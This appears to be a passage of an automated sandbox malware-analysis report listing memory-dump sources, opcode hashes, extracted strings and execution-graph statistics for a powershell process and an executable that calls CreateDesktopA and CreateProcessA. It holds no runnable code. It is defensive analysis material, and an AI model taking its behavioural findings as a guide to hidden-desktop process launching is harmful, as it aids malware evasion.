                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 4daae14e468a919392556658c44d0cc6c1ec4f89d99fa8c977a400962d8dba33
                                                                                                                                                                        • Instruction ID: 1b0f4c62bac535ce6dcb53325e1ff3d03fab9184399ab0615c3af3b9fe1f627d
                                                                                                                                                                        • Opcode Fuzzy Hash: 4daae14e468a919392556658c44d0cc6c1ec4f89d99fa8c977a400962d8dba33
                                                                                                                                                                        • Instruction Fuzzy Hash: 90E0E5357002148F8610DB1ED898C6AB7EAEFDE66571900AAE949CB331DA61EC018B90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 51bc5bcae51f18e517309a5cd0b03cdbb24b16b910dd772cfbe88005b01c7c2a
                                                                                                                                                                        • Instruction ID: 2f287c8d4d2252a2976e24b89546d3fdbd20900665c5b410471d05a1988fb42e
                                                                                                                                                                        • Opcode Fuzzy Hash: 51bc5bcae51f18e517309a5cd0b03cdbb24b16b910dd772cfbe88005b01c7c2a
                                                                                                                                                                        • Instruction Fuzzy Hash: ACE09222B093159BEE54E96A8890277F68DCBC3561706427F8615DF291DE11CC0183E1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 62b1f2ce90c494a11e00c095ae22399963574288b354c0b977cef70a83bc3ce1
                                                                                                                                                                        • Instruction ID: 7fa53369a74787578ca50c82c2dc498d4f5718b2eba50a606cdbdb8d5ce08e1e
                                                                                                                                                                        • Opcode Fuzzy Hash: 62b1f2ce90c494a11e00c095ae22399963574288b354c0b977cef70a83bc3ce1
                                                                                                                                                                        • Instruction Fuzzy Hash: 66F0A0357487545BDB09A774A8286AD3AA5EBC2718F06006FE7058B382CF682D0587D6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: dc255e7de0e8d0ed6be8d6e6808f2f6bdddfc7a893f253f440669cad4de45e4b
                                                                                                                                                                        • Instruction ID: 5b5c04fe0ebed8314e9d12b3b188bf440bc9e5c6d5a757644fde823cadfd60a8
                                                                                                                                                                        • Opcode Fuzzy Hash: dc255e7de0e8d0ed6be8d6e6808f2f6bdddfc7a893f253f440669cad4de45e4b
                                                                                                                                                                        • Instruction Fuzzy Hash: E4E0D82670C39157EF1AD12D6CA1552BFBA8BC362030D82F7F4458F286DD619C058360
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8b3cfaecab8866a51375130e6b4941c7ba4ecf0ca5181f0e7ea5f4e0e0a135ca
                                                                                                                                                                        • Instruction ID: 3b2f48a74747615e66c44b0441240b54e387f38ca967e0c83646f9220d584e33
                                                                                                                                                                        • Opcode Fuzzy Hash: 8b3cfaecab8866a51375130e6b4941c7ba4ecf0ca5181f0e7ea5f4e0e0a135ca
                                                                                                                                                                        • Instruction Fuzzy Hash: 8CF0C9749003049BD764DB79D89879ABBE9EB44314F00546ED65EC7340DB39A8818B91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 588d9cd069c902e336490f723e2f2f22222baf8bf8e2c707f5fc64a885dc9772
                                                                                                                                                                        • Instruction ID: e0749409aa98f917a7d381abeba4ddd2f8fcf0ca157bd4beebbbe89ce35003da
                                                                                                                                                                        • Opcode Fuzzy Hash: 588d9cd069c902e336490f723e2f2f22222baf8bf8e2c707f5fc64a885dc9772
                                                                                                                                                                        • Instruction Fuzzy Hash: DFE0DF3970421487CB086774A42C2AE7A96EBC5728F01002ED70A87341CF786C0287DA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b8142cad73b04d5aabb39b14177ed996e5f7686c4f752d12bba9caea83e957ce
                                                                                                                                                                        • Instruction ID: 33ab860f00568f7a46d1c5d7f47afea516c7e3866b11af0f9bb70c39d89a4074
• Opcode Fuzzy Hash: b8142cad73b04d5aabb39b14177ed996e5f7686c4f752d12bba9caea83e957ce
• Instruction Fuzzy Hash: 84D09E16B0A2265BFD94B5AE5C907BBE1CECAC74A1B4A017F9A05DF242ED44CC0507F1
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d67bb581e23c7239a260ecc5d47f178eec9c45a5efcc4f7b2bc3b227d02ffbd1
• Instruction ID: 7018285d265858d681f3fb933e050b35e906234476b14e8f624d4b1a349f6f89
• Opcode Fuzzy Hash: d67bb581e23c7239a260ecc5d47f178eec9c45a5efcc4f7b2bc3b227d02ffbd1
• Instruction Fuzzy Hash: 1BE08C35740614478611AA2EA81085FB6DADBC4662344446EE15987300DEA4E8068BD6
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
• Instruction ID: ff92662eafdb0094743fd50d6b10b84f5296d34af06944e1080b304aa61a9523
• Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
• Instruction Fuzzy Hash: 59E08631B04018DB8B08D699D4514E9F7A9DBCC220F04847FD90AA7750DA32591686E1
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ff7d27ce04746090da35647e7759ec25f04b1c8059aa268054e59ccdd4264205
• Instruction ID: 0b165a2b30851794dee8a690ab9a7aa66276134bf4b25681c763f217c230d477
• Opcode Fuzzy Hash: ff7d27ce04746090da35647e7759ec25f04b1c8059aa268054e59ccdd4264205
• Instruction Fuzzy Hash: C2E01A35854109CFCB0DFBA4D8AA8E9BF38FA11305B41159ED516576A2DA302A86CFC0
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c41d1a15f77208fda0bb42de2ebe61f147ab458d8ec498638b36c947841339b8
• Instruction ID: 6f8e89b56d3b2d5ec57955f3d2ca416805cc1beccca481f697da8946c5c46a9a
• Opcode Fuzzy Hash: c41d1a15f77208fda0bb42de2ebe61f147ab458d8ec498638b36c947841339b8
• Instruction Fuzzy Hash: 8AE0D834A082058FC749DFB4D09646ABFB8EF45308B014169DE0697351D6309C41CF81
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d4995b55a588db5c71e0f6a60ba5424f0ea5b9d4924230b7334d757bfb1889f0
• Instruction ID: 31756e48616cdb493dc1968995627c00258a0f41a71b082a95d4131a0fa8f1ae
• Opcode Fuzzy Hash: d4995b55a588db5c71e0f6a60ba5424f0ea5b9d4924230b7334d757bfb1889f0
• Instruction Fuzzy Hash: DCE01A70D0414A9F9B80EFBCC4812AEFFF0EF5A204B6085EEC958EB201E6324651DB91
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
• Instruction ID: 44395b00df968f29d285aae8058528ecafd05b204046487d54c2584093c6d499
• Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
• Instruction Fuzzy Hash: E8D067B0D04209DF8B80EFADC94156EFBF4EB48205F6085AA8919E7301E7329A12CBD1
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aad1f9676b11fb5a213c10b037466b2a40c78de98c33f85ac669d736eec94c92
• Instruction ID: 60112881b47d016523e0de5c65dad2e1a6913077f8bd3466659a3681e2b26fbb
• Opcode Fuzzy Hash: aad1f9676b11fb5a213c10b037466b2a40c78de98c33f85ac669d736eec94c92
• Instruction Fuzzy Hash: ACD06731844109CBCB08EBA4E86B4FDBB74FA54305F4151ADE91752691EA312A5ACFC5
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b851d0b95a1574629286cb3dbaff03d31ed5f8076b85b5c5954266f73f9d9c2a
• Instruction ID: e55d98f8d73e9578bf1d18e6de7c9ef4c4fd0d8fe2c2340fb19100b2df6c9791
• Opcode Fuzzy Hash: b851d0b95a1574629286cb3dbaff03d31ed5f8076b85b5c5954266f73f9d9c2a
• Instruction Fuzzy Hash: 1FD05B34E4420ACFCB18EF64D45646EBBF5EB45305F004159DE0593340E6306D01CFC1
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b2984c0906bff5fff34a316afb24667c40a817d53e4eda4d9a96323e15e9ddc2
• Instruction ID: 3cb51dfd90c6e3a093a2814cbd83202eed4d00f22274587096191b581ad34008
• Opcode Fuzzy Hash: b2984c0906bff5fff34a316afb24667c40a817d53e4eda4d9a96323e15e9ddc2
• Instruction Fuzzy Hash: 2FD05E3804D3C18FC7178B3C94944083F305D0311531504DDD486DF9A3C626848ACB17
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 69bdd88499bface2891761d27397573578990b68aaf7d97ff21bd559cd416cde
• Instruction ID: 5da66288ae27d5548d259cd4be12150e9f4b62ff8fdbafcf529e78b4ee55243b
• Opcode Fuzzy Hash: 69bdd88499bface2891761d27397573578990b68aaf7d97ff21bd559cd416cde
• Instruction Fuzzy Hash: FEC08C1400E3D00FEF039338CC9A1013FB10D8311930E01CAC0C1CF8A3C968884ACB43
Memory Dump Source
• Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 83d14b80a60cada217421fbbc234dbfcca62d1028a5caf0d2473bd25f4c4f5e7
• Instruction ID: ebd9e29ff5a0fd89d9429852cd16e446c9e799b65b3bc8a8919c407f4a5a5328
• Opcode Fuzzy Hash: 83d14b80a60cada217421fbbc234dbfcca62d1028a5caf0d2473bd25f4c4f5e7
• Instruction Fuzzy Hash: 58B0923104470ACFC2496F75E4488157329BB4021978008ACE90E4AA928F3AE88ACA45
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1889936093.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7910000_powershell.jbxd
Similarity
• API ID:
• String ID: $cqk$4'^q$4'^q$4'^q$4'^q$84|l$84|l$piFk$tP^q$tP^q$r~l$r~l
• API String ID: 0-2175947571
• Opcode ID: 1d12706077fa8e6ecfa07862f79e4059c065092b48cc26194bcdfe1ff8dbca65
• Instruction ID: f8029429ef5d1a68556e84f7d3bf14abe93b257f2d3c74326dcf3d7c4cf00547
• Opcode Fuzzy Hash: 1d12706077fa8e6ecfa07862f79e4059c065092b48cc26194bcdfe1ff8dbca65
• Instruction Fuzzy Hash: C3D176B5B0421EAFCB149B6884046AABBF6EFC5315F14C46BDA15CF341DB31C8A5C792
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1889936093.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7910000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$tl$tl
• API String ID: 0-4116796712
• Opcode ID: 8751ce02940f029fffd2a6783f52d2218e174289fd420e8eff53a920ff2e0c96
• Instruction ID: 0d1ac0e5bf9af22641bf8e0e7a410822cd19132d336885e20c9a76e3e20f0ae3
• Opcode Fuzzy Hash: 8751ce02940f029fffd2a6783f52d2218e174289fd420e8eff53a920ff2e0c96
• Instruction Fuzzy Hash: EEA197B27043199FDB148A69880177ABBFAAFC5324F14846FD909CF391DE31C865C3A1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1889936093.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7910000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: fcq$4'^q$4'^q$4'^q$4'^q$r~l$r~l
                                                                                                                                                                        • API String ID: 0-1826034293
                                                                                                                                                                        • Opcode ID: b0287f0d68a719e72e98eb3c802c4bf8ed6ae7b751f5dec6d9c10b9148499492
                                                                                                                                                                        • Instruction ID: ba8de7777f4d9d9ed54f9644e448896ad71a7d03fe59781d8716ccc2d5542223
                                                                                                                                                                        • Opcode Fuzzy Hash: b0287f0d68a719e72e98eb3c802c4bf8ed6ae7b751f5dec6d9c10b9148499492
                                                                                                                                                                        • Instruction Fuzzy Hash: E6F155B170421A8FCB149B6CC45076ABBE6AFC5315F14847AD50ACF781EB32DCA6C7A1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1889936093.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7910000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q$tl$tl
                                                                                                                                                                        • API String ID: 0-750435783
                                                                                                                                                                        • Opcode ID: ee60c1fb7b89a7d810a92f989d1dc1bc162f55d389126e2a302ba5de4d6243d0
                                                                                                                                                                        • Instruction ID: abe0cd4864eeb0de39b9516efd499adeadb861ba6bebd985f010abc31e0f4633
                                                                                                                                                                        • Opcode Fuzzy Hash: ee60c1fb7b89a7d810a92f989d1dc1bc162f55d389126e2a302ba5de4d6243d0
                                                                                                                                                                        • Instruction Fuzzy Hash: 5E5137F270430E9FCB245B698805766BFF6AFC6629F2484BAD405CB741DB31C8A5C7A1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tM~l$`_q$`_q$`_q$`_q
                                                                                                                                                                        • API String ID: 0-4175844202
                                                                                                                                                                        • Opcode ID: fd01e582dfb0ef7781b981c53b28078cda439904f2d8b32715bfeccbde70c701
                                                                                                                                                                        • Instruction ID: b8dc9ee19696491f719cbefa9b651499159f0d298feba0069690efe9a1e10eed
                                                                                                                                                                        • Opcode Fuzzy Hash: fd01e582dfb0ef7781b981c53b28078cda439904f2d8b32715bfeccbde70c701
                                                                                                                                                                        • Instruction Fuzzy Hash: E9B1A274A003199FDB54DFA9D980A9DFBF2FF88301F14862AE419AB345DB70A945CF90
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tM~l$`_q$`_q$`_q$`_q
                                                                                                                                                                        • API String ID: 0-4175844202
                                                                                                                                                                        • Opcode ID: e30c2e7f4e75b493298ff89077c795e66f666c5d21b8f706064e7bc7ff77706c
                                                                                                                                                                        • Instruction ID: 66933c33ba0fabdebe5cd8b03fb312ba1e5378d0ebdd74ea867ed4e35a0c0cd4
                                                                                                                                                                        • Opcode Fuzzy Hash: e30c2e7f4e75b493298ff89077c795e66f666c5d21b8f706064e7bc7ff77706c
                                                                                                                                                                        • Instruction Fuzzy Hash: D2B18374E102199FDB54DFA9D980A9DFBF2FF48301F14862AE419AB344DB70A945CF90
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: xo^$xo^$xo^$xo^$xo^
                                                                                                                                                                        • API String ID: 0-2425003715
                                                                                                                                                                        • Opcode ID: 9e8d5019a979e861e50e15fcd5e739d32346eaed0b760b7998cd442119b61df1
                                                                                                                                                                        • Instruction ID: 9a50ee79e95ad5de7cd741b28440bb9a7c90cbabe1a9fb49b663c37970192c7e
                                                                                                                                                                        • Opcode Fuzzy Hash: 9e8d5019a979e861e50e15fcd5e739d32346eaed0b760b7998cd442119b61df1
                                                                                                                                                                        • Instruction Fuzzy Hash: 0A31295251E3C15FD30B873998A81807FB0AF671A871E01EBC1E8CF4A7D819285BC76B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: xo^$xo^$xo^$xo^
                                                                                                                                                                        • API String ID: 0-901232421
                                                                                                                                                                        • Opcode ID: 90beae5a2af84eefa79ed98f008175f9f6f43d58f5d74a54461ffe2a56490d00
                                                                                                                                                                        • Instruction ID: 68d47e9f53bc6de1e4ae300c4bf67abaa55ef9930e231cc87ae12bf256853342
                                                                                                                                                                        • Opcode Fuzzy Hash: 90beae5a2af84eefa79ed98f008175f9f6f43d58f5d74a54461ffe2a56490d00
                                                                                                                                                                        • Instruction Fuzzy Hash: 7E41255150F3C26FD307873898A91957FB0AD1722435E42C7C4E4CF8B3DA68586AC763
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: xo^$xo^$xo^$xo^
                                                                                                                                                                        • API String ID: 0-901232421
                                                                                                                                                                        • Opcode ID: 240f9bb00439bb239e2311fbbbf95d33d2a2f891805a455f52d2156476b095c0
                                                                                                                                                                        • Instruction ID: 3a0a36b43a95cdb2bf522db4e9ea63350cea7bb908b0e08eb711729b2d3acba6
                                                                                                                                                                        • Opcode Fuzzy Hash: 240f9bb00439bb239e2311fbbbf95d33d2a2f891805a455f52d2156476b095c0
                                                                                                                                                                        • Instruction Fuzzy Hash: F6416F6161A3C15FD707DB2C98A45817FF0AF9725870A05E7D0D4CF5A7DA14984AC3A3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1889936093.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7910000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                        • API String ID: 0-2125118731
                                                                                                                                                                        • Opcode ID: 9a3a3e7a960dd83a04ccff62a9af9546d4a368e28d4d84c4543724c01405d533
                                                                                                                                                                        • Instruction ID: 4df016c97eecb4ae05fc703b233d1f61a113a4e90c5ec4edc683f88d3b2c2bb1
                                                                                                                                                                        • Opcode Fuzzy Hash: 9a3a3e7a960dd83a04ccff62a9af9546d4a368e28d4d84c4543724c01405d533
                                                                                                                                                                        • Instruction Fuzzy Hash: EA216BF271030A9BDB34597A9801B37B7DB5BC0719F26886AA505CF781DD75C8618361
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1889936093.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7910000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                        • API String ID: 0-2049395529
                                                                                                                                                                        • Opcode ID: 0ca78e119a2f766d6dbefc79e312f89c1885a75a77e3dedbb71d6fdcf6ce8b0b
                                                                                                                                                                        • Instruction ID: 5c39c80c8943651b8ac1717efe941b66b6926cfbdc183cce1f3c1b43245b99a4
                                                                                                                                                                        • Opcode Fuzzy Hash: 0ca78e119a2f766d6dbefc79e312f89c1885a75a77e3dedbb71d6fdcf6ce8b0b
                                                                                                                                                                        • Instruction Fuzzy Hash: B7016671B0826A4FC72A522C58202A52BF69F8665472905ABC041CF342DE269C9B8392

Execution Graph

Execution Coverage: 12.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 5%
Total number of Nodes: 202
Total number of Limit Nodes: 1

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 569 41cb56-41cd00 CreateDesktopA memset * 2 CreateProcessA
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                         • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                         • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Creatememset$DesktopProcess
                                                                                                                                                                        • String ID: OCALAPPDATA
                                                                                                                                                                        • API String ID: 2911880311-2158123194
                                                                                                                                                                        • Opcode ID: df3894671ed378ae8f98c75e437b6fcbf7c2463c26c69d7b82021d695b4e2206
                                                                                                                                                                        • Instruction ID: ecc39fbefac0841ba03244daffe3c5161f46bbd8383f0468050ffefe366c0534
                                                                                                                                                                        • Opcode Fuzzy Hash: df3894671ed378ae8f98c75e437b6fcbf7c2463c26c69d7b82021d695b4e2206
                                                                                                                                                                        • Instruction Fuzzy Hash: BA5192B2E046009BD704CF68DD84AE9B7F5EFD9304F09456DE949E3321F7B0AA848B95

